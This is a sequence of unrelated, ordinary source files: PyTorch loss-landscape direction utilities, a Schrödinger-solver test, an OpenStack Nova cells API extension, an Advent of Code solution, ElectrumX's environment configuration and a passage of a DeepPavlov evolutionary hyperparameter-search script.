new_states = copy.deepcopy(states)
assert (len(new_states) == len(changes))
for (k, v), d in zip(new_states.items(), changes):
d = torch.tensor(d)
v.add_(d.type_as(v.dtype))
net.load_state_dict(new_states)
def get_random_weights(weights):
"""
Produce a random direction that is a list of random Gaussian tensors
with the same shape as the network's weights, so one direction entry per weight.
"""
return [torch.randn(w.size()) for w in weights]
def get_random_states(states):
"""
Produce a random direction that is a list of random Gaussian tensors
with the same shape as the network's state_dict(), so one direction entry
per weight, including BN's running_mean/var.
"""
return [torch.randn(w.size()) for k, w in states.items()]
def get_diff_weights(weights, weights2):
""" Produce a direction from 'weights' to 'weights2'."""
return [w2 - w for (w, w2) in zip(weights, weights2)]
def get_diff_states(states, states2):
""" Produce a direction from 'states' to 'states2'."""
return [v2 - v for (k, v), (k2, v2) in zip(states.items(), states2.items())]
################################################################################
# Normalization Functions
################################################################################
def normalize_direction(direction, weights, norm='filter'):
"""
Rescale the direction so that it has similar norm as their corresponding
model in different levels.
Args:
direction: a variables of the random direction for one layer
weights: a variable of the original model for one layer
norm: normalization method, 'filter' | 'layer' | 'weight'
"""
if norm == 'filter':
# Rescale the filters (weights in group) in 'direction' so that each
# filter has the same norm as its corresponding filter in 'weights'.
for d, w in zip(direction, weights):
d.mul_(w.norm()/(d.norm() + 1e-10))
elif norm == 'layer':
# Rescale the layer variables in the direction so that each layer has
# the same norm as the layer variables in weights.
direction.mul_(weights.norm()/direction.norm())
elif norm == 'weight':
# Rescale the entries in the direction so that each entry has the same
# scale as the corresponding weight.
direction.mul_(weights)
elif norm == 'dfilter':
# Rescale the entries in the direction so that each filter direction
# has the unit norm.
for d in direction:
d.div_(d.norm() + 1e-10)
elif norm == 'dlayer':
# Rescale the entries in the direction so that each layer direction has
# the unit norm.
direction.div_(direction.norm())
def normalize_directions_for_weights(direction, weights, norm='filter', ignore='biasbn'):
"""
The normalization scales the direction entries according to the entries of weights.
"""
assert(len(direction) == len(weights))
for d, w in zip(direction, weights):
if d.dim() <= 1:
if ignore == 'biasbn':
d.fill_(0) # ignore directions for weights with 1 dimension
else:
d.copy_(w) # keep directions for weights/bias that are only 1 per node
else:
normalize_direction(d, w, norm)
def normalize_directions_for_states(direction, states, norm='filter', ignore='ignore'):
assert(len(direction) == len(states))
for d, (k, w) in zip(direction, states.items()):
if d.dim() <= 1:
if ignore == 'biasbn':
d.fill_(0) # ignore directions for weights with 1 dimension
else:
d.copy_(w) # keep directions for weights/bias that are only 1 per node
else:
normalize_direction(d, w, norm)
def ignore_biasbn(directions):
""" Set bias and bn parameters in directions to zero """
for d in directions:
if d.dim() <= 1:
d.fill_(0)
################################################################################
# Create directions
################################################################################
def create_target_direction(net, net2, dir_type='states'):
"""
Setup a target direction from one model to the other
Args:
net: the source model
net2: the target model with the same architecture as net.
dir_type: 'weights' or 'states', type of directions.
Returns:
direction: the target direction from net to net2 with the same dimension
as weights or states.
"""
assert (net2 is not None)
# direction between net2 and net
if dir_type == 'weights':
w = get_weights(net)
w2 = get_weights(net2)
direction = get_diff_weights(w, w2)
elif dir_type == 'states':
s = net.state_dict()
s2 = net2.state_dict()
direction = get_diff_states(s, s2)
return direction
def create_random_direction(net, dir_type='weights', ignore='biasbn', norm='filter'):
"""
Setup a random (normalized) direction with the same dimension as
the weights or states.
Args:
net: the given trained model
dir_type: 'weights' or 'states', type of directions.
ignore: 'biasbn', ignore biases and BN parameters.
norm: direction normalization method, including
'filter" | 'layer' | 'weight' | 'dlayer' | 'dfilter'
Returns:
direction: a random direction with the same dimension as weights or states.
"""
# random direction
if dir_type == 'weights':
weights = get_weights(net) # a list of parameters.
direction = get_random_weights(weights)
normalize_directions_for_weights(direction, weights, norm, ignore)
elif dir_type == 'states':
states = net.state_dict() # a dict of parameters, including BN's running mean/var.
direction = get_random_states(states)
normalize_directions_for_states(direction, states, norm, ignore)
return direction
def setup_direction(args, dir_file, net):
"""
Setup the h5 file to store the directions.
- xdirection, ydirection: The pertubation direction added to the mdoel.
The direction is a list of tensors.
"""
print('-------------------------------------------------------------------')
print('setup_direction')
print('-------------------------------------------------------------------')
# Skip if the direction file already exists
if exists(dir_file):
f = h5py.File(dir_file, 'r')
if (args.y and 'ydirection' in f.keys()) or 'xdirection' in f.keys():
f.close()
print ("%s is already setted up" % dir_file)
return
f.close()
# Create the plotting directions
f = h5py.File(dir_file,'w') # create file, fail if exists
if not args.dir_file:
print("Setting up the plotting directions...")
if args.model_file2:
net2 = model_loader.load(args.dataset, args.model, args.model_file2)
xdirection = create_target_direction(net, net2, args.dir_type)
else:
xdirection = create_random_direction(net, args.dir_type, args.xignore, args.xnorm)
h5_util.write_list(f, 'xdirection', xdirection)
if args.y:
if args.same_dir:
ydirection = xdirection
elif args.model_file3:
net3 = model_loader.load(args.dataset, args.model, args.model_file3)
ydirection = create_target_direction(net, net3, args.dir_type)
else:
ydirection = create_random_direction(net, args.dir_type, args.yignore, args.ynorm)
h5_util.write_list(f, 'ydirection', ydirection)
f.close()
print ("direction file created: %s" % dir_file)
def name_direction_file(args):
""" Name the direction file that stores the random directions. """
if args.dir_file:
assert exists(args.dir_file), "%s does not exist!" % args.dir_file
return args.dir_file
dir_file = ""
file1, file2, file3 = args.model_file, args.model_file2, args.model_file3
# name for xdirection
if file2:
# 1D linear interpolation between two models
assert exists(file2), file2 + " does not exist!"
if file1[:file1.rfind('/')] == file2[:file2.rfind('/')]:
# model_file and model_file2 are under the same folder
dir_file += file1 + '_' + file2[file2.rfind('/')+1:]
else:
# model_file and model_file2 are under different folders
prefix = commonprefix([file1, file2])
prefix = prefix[0:prefix.rfind('/')]
dir_file += file1[:file1.rfind('/')] + '_' + file1[file1.rfind('/')+1:] + '_' + \
file2[len(prefix)+1: file2.rfind('/')] + '_' + file2[file2.rfind('/')+1:]
else:
dir_file += file1
dir_file += '_' + args.dir_type
if args.xignore:
dir_file += '_xignore=' + args.xignore
if args.xnorm:
dir_file += '_xnorm=' + args.xnorm
# name for ydirection
if args.y:
if file3:
assert exists(file3), "%s does not exist!" % file3
if file1[:file1.rfind('/')] == file3[:file3.rfind('/')]:
dir_file += file3
else:
# model_file and model_file3 are under different folders
dir_file += file3[:file3.rfind('/')] + '_' + file3[file3.rfind('/')+1:]
else:
if args.yignore:
dir_file += '_yignore=' + args.yignore
if args.ynorm:
dir_file += '_ynorm=' + args.ynorm
if args.same_dir: # ydirection is the same as xdirection
dir_file += '_same_dir'
# index number
if args.idx > 0: dir_file += '_idx=' + str(args.idx)
dir_file += ".h5"
return dir_file
def load_directions(dir_file):
""" Load direction(s) from the direction file."""
f = h5py.File(dir_file, 'r')
if 'ydirection' in f.keys(): # If this is a 2D plot
xdirection = h5_util.read_list(f, 'xdirection')
ydirection = h5_util.read_list(f, 'ydirection')
directions = [xdirection, ydirection]
else:
directions = [h5_util.read_list(f, 'xdirection')]
return directions
|
the-stack_106_13045
|
"""Contains tests for the private _solvers module"""
from numpy import insert, loadtxt, allclose
import pytest
from qmpy.solvers import schroedinger
from qmpy._fileio import _read_schrodinger
PROBLEMS = ['inf_potwell', 'fin_potwell', 'double_well', 'asym_potwell',
'harm_osci']
@pytest.mark.parametrize('problem', PROBLEMS)
def test_computing(problem):
"""
Tests whether the computed wavefunctions and energies match the
reference data.
"""
path = 'tests/test_data/{}.inp'.format(problem)
specs = _read_schrodinger(path)
vals = dict()
vals['mass'] = specs['mass']
vals['xcords'] = specs['interpolxydecs'][:, 0]
vals['potential'] = specs['interpolxydecs'][:, 1]
vals['xopt'], kind = (specs['xopt'], specs['interpoltype'])
evs = (specs['first_ev'] - 1, specs['last_ev'] - 1)
comp_energies, wfuncs, pot = schroedinger(vals, interpol=True,
interpoltype=kind,
select_range=evs)
comp_funcs = insert(wfuncs.T, 0, values=pot[:, 1].T, axis=1)
ref_energies = loadtxt('tests/test_data/energies_{}.ref'.format(problem))
ref_wfuncs = loadtxt('tests/test_data/wfuncs_{}.ref'.format(problem))
assert allclose(ref_energies, comp_energies)
assert allclose(ref_wfuncs, comp_funcs)
|
the-stack_106_13046
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The cells extension."""
from oslo.config import cfg
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.cells import rpc_driver
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.import_opt('name', 'nova.cells.opts', group='cells')
CONF.import_opt('capabilities', 'nova.cells.opts', group='cells')
ALIAS = "os-cells"
authorize = extensions.extension_authorizer('compute', 'v3:' + ALIAS)
def make_cell(elem):
elem.set('name')
elem.set('username')
elem.set('type')
elem.set('rpc_host')
elem.set('rpc_port')
caps = xmlutil.SubTemplateElement(elem, 'capabilities',
selector='capabilities')
cap = xmlutil.SubTemplateElement(caps, xmlutil.Selector(0),
selector=xmlutil.get_items)
cap.text = 1
make_capacity(elem)
def make_capacity(cell):
def get_units_by_mb(capacity_info):
return capacity_info['units_by_mb'].items()
capacity = xmlutil.SubTemplateElement(cell, 'capacities',
selector='capacities')
ram_free = xmlutil.SubTemplateElement(capacity, 'ram_free',
selector='ram_free')
ram_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(ram_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
disk_free = xmlutil.SubTemplateElement(capacity, 'disk_free',
selector='disk_free')
disk_free.set('total_mb', 'total_mb')
unit_by_mb = xmlutil.SubTemplateElement(disk_free, 'unit_by_mb',
selector=get_units_by_mb)
unit_by_mb.set('mb', 0)
unit_by_mb.set('unit', 1)
cell_nsmap = {None: wsgi.XMLNS_V10}
class CellTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cell', selector='cell')
make_cell(root)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('cells')
elem = xmlutil.SubTemplateElement(root, 'cell', selector='cells')
make_cell(elem)
return xmlutil.MasterTemplate(root, 1, nsmap=cell_nsmap)
class CellDeserializer(wsgi.XMLDeserializer):
"""Deserializer to handle xml-formatted cell create requests."""
def _extract_capabilities(self, cap_node):
caps = {}
for cap in cap_node.childNodes:
cap_name = cap.tagName
caps[cap_name] = self.extract_text(cap)
return caps
def _extract_cell(self, node):
cell = {}
cell_node = self.find_first_child_named(node, 'cell')
extract_fns = {
'capabilities': self._extract_capabilities,
'rpc_port': lambda child: int(self.extract_text(child)),
}
for child in cell_node.childNodes:
name = child.tagName
extract_fn = extract_fns.get(name, self.extract_text)
cell[name] = extract_fn(child)
return cell
def default(self, string):
"""Deserialize an xml-formatted cell create request."""
node = xmlutil.safe_minidom_parse_string(string)
return {'body': {'cell': self._extract_cell(node)}}
def _filter_keys(item, keys):
"""
Filters all model attributes except for keys
item is a dict
"""
return dict((k, v) for k, v in item.iteritems() if k in keys)
def _fixup_cell_info(cell_info, keys):
"""
If the transport_url is present in the cell, derive username,
rpc_host, and rpc_port from it.
"""
if 'transport_url' not in cell_info:
return
# Disassemble the transport URL
transport_url = cell_info.pop('transport_url')
try:
transport = rpc_driver.parse_transport_url(transport_url)
except ValueError:
# Just go with None's
for key in keys:
cell_info.setdefault(key, None)
return cell_info
transport_field_map = {'rpc_host': 'hostname', 'rpc_port': 'port'}
for key in keys:
if key in cell_info:
continue
transport_field = transport_field_map.get(key, key)
cell_info[key] = transport[transport_field]
def _scrub_cell(cell, detail=False):
keys = ['name', 'username', 'rpc_host', 'rpc_port']
if detail:
keys.append('capabilities')
cell_info = _filter_keys(cell, keys + ['transport_url'])
_fixup_cell_info(cell_info, keys)
cell_info['type'] = 'parent' if cell['is_parent'] else 'child'
return cell_info
class CellsController(object):
"""Controller for Cell resources."""
def __init__(self):
self.compute_api = compute.API()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
def _get_cells(self, ctxt, req, detail=False):
"""Return all cells."""
# Ask the CellsManager for the most recent data
items = self.cells_rpcapi.get_cell_info_for_neighbors(ctxt)
items = common.limited(items, req)
items = [_scrub_cell(item, detail=detail) for item in items]
return dict(cells=items)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellsTemplate)
def index(self, req):
"""Return all cells in brief."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellsTemplate)
def detail(self, req):
"""Return all cells in detail."""
ctxt = req.environ['nova.context']
authorize(ctxt)
return self._get_cells(ctxt, req, detail=True)
@extensions.expected_errors(())
@wsgi.serializers(xml=CellTemplate)
def info(self, req):
"""Return name and capabilities for this cell."""
context = req.environ['nova.context']
authorize(context)
cell_capabs = {}
my_caps = CONF.cells.capabilities
for cap in my_caps:
key, value = cap.split('=')
cell_capabs[key] = value
cell = {'name': CONF.cells.name,
'type': 'self',
'rpc_host': None,
'rpc_port': 0,
'username': None,
'capabilities': cell_capabs}
return dict(cell=cell)
@extensions.expected_errors(404)
@wsgi.serializers(xml=CellTemplate)
def capacities(self, req, id=None):
"""Return capacities for a given cell or all cells."""
# TODO(kaushikc): return capacities as a part of cell info and
# cells detail calls in v3, along with capabilities
context = req.environ['nova.context']
authorize(context)
try:
capacities = self.cells_rpcapi.get_capacities(context,
cell_name=id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell={"capacities": capacities})
@extensions.expected_errors(404)
@wsgi.serializers(xml=CellTemplate)
def show(self, req, id):
"""Return data about the given cell name. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
cell = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors((403, 404))
@wsgi.response(204)
def delete(self, req, id):
"""Delete a child or parent cell entry. 'id' is a cell name."""
context = req.environ['nova.context']
authorize(context)
try:
num_deleted = self.cells_rpcapi.cell_delete(context, id)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
if num_deleted == 0:
raise exc.HTTPNotFound(
explanation=_("Cell %s doesn't exist.") % id)
def _validate_cell_name(self, cell_name):
"""Validate cell name is not empty and doesn't contain '!' or '.'."""
if not cell_name:
msg = _("Cell name cannot be empty")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
if '!' in cell_name or '.' in cell_name:
msg = _("Cell name cannot contain '!' or '.'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _validate_cell_type(self, cell_type):
"""Validate cell_type is 'parent' or 'child'."""
if cell_type not in ['parent', 'child']:
msg = _("Cell type must be 'parent' or 'child'")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
def _normalize_cell(self, cell, existing=None):
"""
Normalize input cell data. Normalizations include:
* Converting cell['type'] to is_parent boolean.
* Merging existing transport URL with transport information.
"""
# Start with the cell type conversion
if 'type' in cell:
self._validate_cell_type(cell['type'])
cell['is_parent'] = cell['type'] == 'parent'
del cell['type']
else:
cell['is_parent'] = False
# Now we disassemble the existing transport URL...
transport = {}
if existing and 'transport_url' in existing:
transport = rpc_driver.parse_transport_url(
existing['transport_url'])
# Copy over the input fields
transport_field_map = {
'username': 'username',
'password': 'password',
'hostname': 'rpc_host',
'port': 'rpc_port',
'virtual_host': 'rpc_virtual_host',
}
for key, input_field in transport_field_map.items():
# Set the default value of the field; using setdefault()
# lets us avoid overriding the existing transport URL
transport.setdefault(key, None)
# Only override the value if we're given an override
if input_field in cell:
transport[key] = cell.pop(input_field)
# Now set the transport URL
cell['transport_url'] = rpc_driver.unparse_transport_url(transport)
@extensions.expected_errors((400, 403))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
@wsgi.response(201)
def create(self, req, body):
"""Create a child cell entry."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
if 'name' not in cell:
msg = _("No cell name in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
self._validate_cell_name(cell['name'])
self._normalize_cell(cell)
try:
cell = self.cells_rpcapi.cell_create(context, cell)
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors((400, 403, 404))
@wsgi.serializers(xml=CellTemplate)
@wsgi.deserializers(xml=CellDeserializer)
def update(self, req, id, body):
"""Update a child cell entry. 'id' is the cell name to update."""
context = req.environ['nova.context']
authorize(context)
if 'cell' not in body:
msg = _("No cell information in request")
LOG.error(msg)
raise exc.HTTPBadRequest(explanation=msg)
cell = body['cell']
cell.pop('id', None)
if 'name' in cell:
self._validate_cell_name(cell['name'])
try:
# NOTE(Vek): There is a race condition here if multiple
# callers are trying to update the cell
# information simultaneously. Since this
# operation is administrative in nature, and
# will be going away in the future, I don't see
# it as much of a problem...
existing = self.cells_rpcapi.cell_get(context, id)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
self._normalize_cell(cell, existing)
try:
cell = self.cells_rpcapi.cell_update(context, id, cell)
except exception.CellNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.CellsUpdateUnsupported as e:
raise exc.HTTPForbidden(explanation=e.format_message())
return dict(cell=_scrub_cell(cell))
@extensions.expected_errors(400)
@wsgi.response(204)
def sync_instances(self, req, body):
"""Tell all cells to sync instance info."""
context = req.environ['nova.context']
authorize(context)
project_id = body.pop('project_id', None)
deleted = body.pop('deleted', False)
updated_since = body.pop('updated_since', None)
if body:
msg = _("Only 'updated_since' and 'project_id' are understood.")
raise exc.HTTPBadRequest(explanation=msg)
if updated_since:
try:
timeutils.parse_isotime(updated_since)
except ValueError:
msg = _('Invalid changes-since value')
raise exc.HTTPBadRequest(explanation=msg)
self.cells_rpcapi.sync_instances(context, project_id=project_id,
updated_since=updated_since, deleted=deleted)
class Cells(extensions.V3APIExtensionBase):
"""Enables cells-related functionality such as adding neighbor cells,
listing neighbor cells, and getting the capabilities of the local cell.
"""
name = "Cells"
alias = ALIAS
namespace = "http://docs.openstack.org/compute/ext/cells/api/v3"
version = 1
def get_resources(self):
coll_actions = {
'detail': 'GET',
'info': 'GET',
'sync_instances': 'POST',
'capacities': 'GET',
}
memb_actions = {
'capacities': 'GET',
}
res = extensions.ResourceExtension(ALIAS, CellsController(),
collection_actions=coll_actions,
member_actions=memb_actions)
return [res]
def get_controller_extensions(self):
return []
|
the-stack_106_13047
|
def read_input(file_name: str) -> [int]:
with open("inputFiles/" + file_name, "r") as file:
lines = file.read().splitlines()[0].split(",")
return [int(i) for i in lines]
def part1(input_value: [int]):
min_fuel = -1
for i in range(max(input_value)):
fuel = 0
for fish in input_value:
fuel += abs(i - fish)
if min_fuel == -1 or fuel < min_fuel:
min_fuel = fuel
return min_fuel
def part2(input_value: [int]):
min_fuel = -1
for i in range(max(input_value)):
fuel = 0
for fish in input_value:
fuel += sum(range(1, abs(i - fish) + 1))
if min_fuel == -1 or fuel < min_fuel:
min_fuel = fuel
return min_fuel
if __name__ == "__main__":
puzzle_input = read_input("day7.txt")
print(f"Part 1: {part1(puzzle_input)}")
print(f"Part 2: {part2(puzzle_input)}")
|
the-stack_106_13048
|
# Copyright (c) 2016, Neil Booth
#
# All rights reserved.
#
# See the file "LICENCE" for information about the copyright
# and warranty status of this software.
'''Class for handling environment configuration and defaults.'''
import re
from ipaddress import IPv4Address, IPv6Address
from aiorpcx import Service, ServicePart
from electrumx.lib.coins import Coin
from electrumx.lib.env_base import EnvBase
class ServiceError(Exception):
pass
class Env(EnvBase):
'''Wraps environment configuration. Optionally, accepts a Coin class
as first argument to have ElectrumX serve custom coins not part of
the standard distribution.
'''
# Peer discovery
PD_OFF, PD_SELF, PD_ON = ('OFF', 'SELF', 'ON')
SSL_PROTOCOLS = {'ssl', 'wss'}
KNOWN_PROTOCOLS = {'ssl', 'tcp', 'ws', 'wss', 'rpc'}
def __init__(self, coin=None):
super().__init__()
self.obsolete(["MAX_SUBSCRIPTIONS", "MAX_SUBS", "MAX_SESSION_SUBS", "BANDWIDTH_LIMIT",
"HOST", "TCP_PORT", "SSL_PORT", "RPC_HOST", "RPC_PORT", "REPORT_HOST",
"REPORT_TCP_PORT", "REPORT_SSL_PORT", "REPORT_HOST_TOR",
"REPORT_TCP_PORT_TOR", "REPORT_SSL_PORT_TOR"])
# Core items
self.db_dir = self.required('DB_DIRECTORY')
self.daemon_url = self.required('DAEMON_URL')
if coin is not None:
assert issubclass(coin, Coin)
self.coin = coin
else:
coin_name = self.required('COIN').strip()
network = self.default('NET', 'mainnet').strip()
self.coin = Coin.lookup_coin_class(coin_name, network)
# Peer discovery
self.peer_discovery = self.peer_discovery_enum()
self.peer_announce = self.boolean('PEER_ANNOUNCE', True)
self.force_proxy = self.boolean('FORCE_PROXY', False)
self.tor_proxy_host = self.default('TOR_PROXY_HOST', 'localhost')
self.tor_proxy_port = self.integer('TOR_PROXY_PORT', None)
# Misc
self.db_engine = self.default('DB_ENGINE', 'leveldb')
self.banner_file = self.default('BANNER_FILE', None)
self.tor_banner_file = self.default('TOR_BANNER_FILE',
self.banner_file)
self.anon_logs = self.boolean('ANON_LOGS', False)
self.log_sessions = self.integer('LOG_SESSIONS', 3600)
self.log_level = self.default('LOG_LEVEL', 'info').upper()
self.donation_address = self.default('DONATION_ADDRESS', '')
self.drop_client = self.custom("DROP_CLIENT", None, re.compile)
self.drop_client_unknown = self.boolean('DROP_CLIENT_UNKNOWN', False)
self.blacklist_url = self.default('BLACKLIST_URL', self.coin.BLACKLIST_URL)
self.cache_MB = self.integer('CACHE_MB', 1200)
self.reorg_limit = self.integer('REORG_LIMIT', self.coin.REORG_LIMIT)
# Server limits to help prevent DoS
self.max_send = self.integer('MAX_SEND', self.coin.DEFAULT_MAX_SEND)
self.max_sessions = self.sane_max_sessions()
self.cost_soft_limit = self.integer('COST_SOFT_LIMIT', 1000)
self.cost_hard_limit = self.integer('COST_HARD_LIMIT', 10000)
self.bw_unit_cost = self.integer('BANDWIDTH_UNIT_COST', 5000)
self.initial_concurrent = self.integer('INITIAL_CONCURRENT', 10)
self.request_sleep = self.integer('REQUEST_SLEEP', 2500)
self.request_timeout = self.integer('REQUEST_TIMEOUT', 30)
self.session_timeout = self.integer('SESSION_TIMEOUT', 600)
# Services last - uses some env vars above
self.services = self.services_to_run()
if {service.protocol for service in self.services}.intersection(self.SSL_PROTOCOLS):
self.ssl_certfile = self.required('SSL_CERTFILE')
self.ssl_keyfile = self.required('SSL_KEYFILE')
self.report_services = self.services_to_report()
def sane_max_sessions(self):
'''Return the maximum number of sessions to permit. Normally this
is MAX_SESSIONS. However, to prevent open file exhaustion, ajdust
downwards if running with a small open file rlimit.'''
env_value = self.integer('MAX_SESSIONS', 1000)
# No resource module on Windows
try:
import resource
nofile_limit = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
# We give the DB 250 files; allow ElectrumX 100 for itself
value = max(0, min(env_value, nofile_limit - 350))
if value < env_value:
self.logger.warning(
f'lowered maximum sessions from {env_value:,d} to '
f'{value:,d} because your open file limit is '
f'{nofile_limit:,d}'
)
except ImportError:
value = 512 # that is what returned by stdio's _getmaxstdio()
return value
def _parse_services(self, services_str, default_func):
result = []
for service_str in services_str.split(','):
if not service_str:
continue
try:
service = Service.from_string(service_str, default_func=default_func)
except Exception as e:
raise ServiceError(f'"{service_str}" invalid: {e}') from None
if service.protocol not in self.KNOWN_PROTOCOLS:
raise ServiceError(f'"{service_str}" invalid: unknown protocol')
result.append(service)
# Find duplicate addresses
service_map = {service.address: [] for service in result}
for service in result:
service_map[service.address].append(service)
for address, services in service_map.items():
if len(services) > 1:
raise ServiceError(f'address {address} has multiple services')
return result
def services_to_run(self):
def default_part(protocol, part):
return default_services.get(protocol, {}).get(part)
default_services = {protocol: {ServicePart.HOST: 'all_interfaces'}
for protocol in self.KNOWN_PROTOCOLS}
default_services['rpc'] = {ServicePart.HOST: 'localhost', ServicePart.PORT: 8000}
services = self._parse_services(self.default('SERVICES', ''), default_part)
# Find onion hosts
for service in services:
if str(service.host).endswith('.onion'):
raise ServiceError(f'bad host for SERVICES: {service}')
return services
def services_to_report(self):
services = self._parse_services(self.default('REPORT_SERVICES', ''), None)
for service in services:
if service.protocol == 'rpc':
raise ServiceError(f'bad protocol for REPORT_SERVICES: {service.protocol}')
if isinstance(service.host, (IPv4Address, IPv6Address)):
ip_addr = service.host
if (ip_addr.is_multicast or ip_addr.is_unspecified or
(ip_addr.is_private and self.peer_announce)):
raise ServiceError(f'bad IP address for REPORT_SERVICES: {ip_addr}')
elif service.host.lower() == 'localhost':
raise ServiceError(f'bad host for REPORT_SERVICES: {service.host}')
return services
def peer_discovery_enum(self):
pd = self.default('PEER_DISCOVERY', 'on').strip().lower()
if pd in ('off', ''):
return self.PD_OFF
elif pd == 'self':
return self.PD_SELF
else:
return self.PD_ON
|
the-stack_106_13049
|
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from pathlib import Path
import sys
import os
import json
from copy import deepcopy
from subprocess import Popen, PIPE
import pandas as pd
p = (Path(__file__) / ".." / "..").resolve()
sys.path.append(str(p))
from deeppavlov.core.common.errors import ConfigError
from deeppavlov.models.evolution.evolution_param_generator import ParamsEvolution
from deeppavlov.core.common.file import read_json, save_json
from deeppavlov.core.common.log import get_logger
from deeppavlov.core.commands.utils import set_deeppavlov_root, expand_path
log = get_logger(__name__)
parser = argparse.ArgumentParser()
parser.add_argument("config_path", help="path to a pipeline json config", type=str)
parser.add_argument('--key_main_model', help='key inserted in dictionary of main model in pipe', default="main")
parser.add_argument('--p_cross', help='probability of crossover', type=float, default=0.2)
parser.add_argument('--pow_cross', help='crossover power', type=float, default=0.1)
parser.add_argument('--p_mut', help='probability of mutation', type=float, default=1.)
parser.add_argument('--pow_mut', help='mutation power', type=float, default=0.1)
parser.add_argument('--p_size', help='population size', type=int, default=10)
parser.add_argument('--gpus', help='visible GPUs divided by comma <<,>>', default="-1")
parser.add_argument('--train_partition',
help='partition of splitted train file', default=1)
parser.add_argument('--start_from_population',
help='population number to start from. 0 means from scratch', default=0)
parser.add_argument('--path_to_population',
help='path to population to start from', default="")
parser.add_argument('--elitism_with_weights',
help='whether to save elite models with weights or without', action='store_true')
parser.add_argument('--iterations', help='Number of iterations', type=int, default=-1)
def find_config(pipeline_config_path: str):
if not Path(pipeline_config_path).is_file():
configs = [c for c in Path(__file__).parent.glob(f'configs/**/{pipeline_config_path}.json')
if str(c.with_suffix('')).endswith(pipeline_config_path)] # a simple way to not allow * and ?
if configs:
log.info(f"Interpreting '{pipeline_config_path}' as '{configs[0]}'")
pipeline_config_path = str(configs[0])
return pipeline_config_path
def main():
args = parser.parse_args()
pipeline_config_path = find_config(args.config_path)
key_main_model = args.key_main_model
population_size = args.p_size
gpus = [int(gpu) for gpu in args.gpus.split(",")]
train_partition = int(args.train_partition)
start_from_population = int(args.start_from_population)
path_to_population = args.path_to_population
elitism_with_weights = args.elitism_with_weights
iterations = int(args.iterations)
p_crossover = args.p_cross
pow_crossover = args.pow_cross
p_mutation = args.p_mut
pow_mutation = args.pow_mut
if os.environ.get("CUDA_VISIBLE_DEVICES") is None:
pass
else:
cvd = [int(gpu) for gpu in os.environ.get("CUDA_VISIBLE_DEVICES").split(",")]
if gpus == [-1]:
gpus = cvd
else:
try:
gpus = [cvd[gpu] for gpu in gpus]
except:
raise ConfigError("Can not use gpus `{}` with CUDA_VISIBLE_DEVICES='{}'".format(
",".join(gpus), ",".join(cvd)
))
basic_params = read_json(pipeline_config_path)
log.info("Given basic params: {}\n".format(json.dumps(basic_params, indent=2)))
# Initialize evolution
evolution = ParamsEvolution(population_size=population_size,
p_crossover=p_crossover, crossover_power=pow_crossover,
p_mutation=p_mutation, mutation_power=pow_mutation,
key_main_model=key_main_model,
seed=42,
train_partition=train_partition,
elitism_with_weights=elitism_with_weights,
**basic_params)
considered_metrics = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "metrics"))[0] + ["metrics"])
log.info(considered_metrics)
evolve_metric = considered_metrics[0]
# Create table variable for gathering results
set_deeppavlov_root(evolution.basic_config)
expand_path(Path(evolution.get_value_from_config(
evolution.basic_config, evolution.main_model_path + ["save_path"]))).mkdir(parents=True, exist_ok=True)
result_file = expand_path(Path(evolution.get_value_from_config(evolution.basic_config,
evolution.main_model_path + ["save_path"])
).joinpath("result_table.csv"))
result_table_columns = []
result_table_dict = {}
for el in considered_metrics:
result_table_dict[el + "_valid"] = []
